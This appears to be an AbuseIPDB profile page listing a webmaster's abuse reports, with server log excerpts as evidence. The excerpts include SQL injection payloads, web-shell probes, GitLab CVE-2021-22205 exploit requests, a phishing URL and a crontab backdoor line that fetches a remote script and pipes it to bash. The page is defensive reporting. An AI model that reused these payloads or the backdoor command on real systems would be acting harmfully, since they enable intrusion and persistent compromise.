User Tobias Kro
joined AbuseIPDB in October 2021 and has reported 9 IP
addresses.
Standing (weight) is
good.
INACTIVE USER
WEBMASTER
| IP |
Date |
Comment |
Categories |
|
🇳🇱
94.232.41.167
|
|
- - 94.232.41.167 - - [11/May/2023:07:53:54 +0200] GET /haendler/hen-ag-49014985?dealerid=49014985&i ...
show more
- - 94.232.41.167 - - [11/May/2023:07:53:54 +0200] GET /haendler/hen-ag-49014985?dealerid=49014985&inserat_type=1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)%7C%7CCHR(99)%7C%7CCHR(99)%2C15) HTTP/1.1 403 0 https://www.technikboerse.com/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 - www.technikboerse.com
- - 94.232.41.167 - - [11/May/2023:07:53:54 +0200] GET /it/suche/ersatzteile?associationid=1&category=1&country=5&dealer_type[]=commercial&dealerid=1&federalstate=NY&inserat_type=2&machinetype[]=b&manufacturer=tre66Aye'%20OR%20671=(SELECT%20671%20FROM%20PG_SLEEP(15))--&model_id=1&only_topad=1&phrase=the&price_from=1&price_to=1&radius_distance_km=10&searchtype=detail&subcategory=1 HTTP/1.1 403 0 https://www.technikboerse.com/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 - www.technikboerse.com
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
🇫🇷
62.4.29.90
|
|
Deutsche Post Phishing https://post-de-export.com/pages/
|
Phishing
Exploited Host
|
|
🇭🇰
43.248.8.234
|
|
43.248.8.234 - - [02/May/2023:09:40:54 +0200] "GET /wp-includes/index.php?pw=Xz6CkKdY&u=aHR0cDovL3No ...
show more
43.248.8.234 - - [02/May/2023:09:40:54 +0200] "GET /wp-includes/index.php?pw=Xz6CkKdY&u=aHR0cDovL3NoLnRoZWJlc3Rjb2RlLnRvcC90ZXh0L3RleHRfMy50eHRz HTTP/2.0" 404 453 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
43.248.8.234 - - [02/May/2023:09:40:54 +0200] "GET /app/languages/index.php?pw=Xz6CkKdY&u=aHR0cDovL3NoLnRoZWJlc3Rjb2RlLnRvcC90ZXh0L3RleHRfMy50eHRz HTTP/2.0" 404 453 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
43.248.8.234 - - [02/May/2023:09:41:31 +0200] "POST /app/yotuwp_cache/Text/?d=2f7661722f637573746f6d6572732f776562732f6d656d6d696e67656e2f776562&k=696e6465782e706870 HTTP/2.0" 302 1386 "https://www.imker-memmingen.de/app/yotuwp_cache/Text/?d=2f7661722f637573746f6d6572732f776562732f6d656d6d696e67656e2f776562&k=696e6465782e706870" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
show less
|
Hacking
Brute-Force
Web App Attack
|
|
🇩🇪
168.119.60.43
|
|
168.119.60.43 - - [25/Jan/2023:08:08:54 +0100] "GET /data:image/svg+xml;charset=utf-8,%3Csvg%20xmlns ...
show more
168.119.60.43 - - [25/Jan/2023:08:08:54 +0100] "GET /data:image/svg+xml;charset=utf-8,%3Csvg%20xmlns%3D& HTTP/1.1" 404 16932 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 BB SC/1.0.0.0"
168.119.60.43 - - [25/Jan/2023:08:08:54 +0100] "GET /politik/horper-eu-kommissar-vella-ueberzieht-forderungen-557594 HTTP/1.1" 200 38003 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 BB SC/1.0.0.0"
..
Also uses IPs:
2a01:4f8:1c1e:d530::1
2a01:4f8:1c17:e286::1
2a01:4ff:f0:2b5f::1
2a01:4f9:c010:b984::1
show less
|
Bad Web Bot
|
|
🇷🇺
185.191.32.198
|
|
Crontab Backdoor hosting: * * * * * wget -q -O - http://185.191.32.198/gi.sh | bash > /dev/null 2>&1
|
Hacking
|
|
🇬🇧
109.237.96.124
|
|
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
109.237.96.124 - - [04/Nov/2021:08:32: ...
show more
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
109.237.96.124 - - [04/Nov/2021:08:32:15 +0100] "POST /uploads/user HTTP/1.1" 301 162 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" -
show less
|
Hacking
Web App Attack
|
|
🇺🇸
192.3.194.202
|
|
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
192.3.194.202 - - [03/Nov/2021:23:32:3 ...
show more
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
192.3.194.202 - - [03/Nov/2021:23:32:39 +0100] "POST /uploads/user HTTP/1.1" 499 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" -
{"correlation_id":"54jQx7mqtJ4","filename":"image.jpg","level":"info","msg":"running exiftool to remove any metadata",
show less
|
Hacking
Web App Attack
|
|
🇨🇳
101.89.108.23
|
|
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
101.89.108.23 - - [04/Nov/2021:08:55:1 ...
show more
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
101.89.108.23 - - [04/Nov/2021:08:55:13 +0100] "POST /uploads/user HTTP/1.1" 200 183 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" -
show less
|
Hacking
Web App Attack
|
|
🇷🇺
62.76.41.46
|
|
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
62.76.41.46 - - [04/Nov/2021:09:02:55 ...
show more
GitLab RCE https://nvd.nist.gov/vuln/detail/CVE-2021-22205
62.76.41.46 - - [04/Nov/2021:09:02:55 +0100] "POST /uploads/user HTTP/1.1" 200 187 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" -
show less
|
Hacking
Web App Attack
|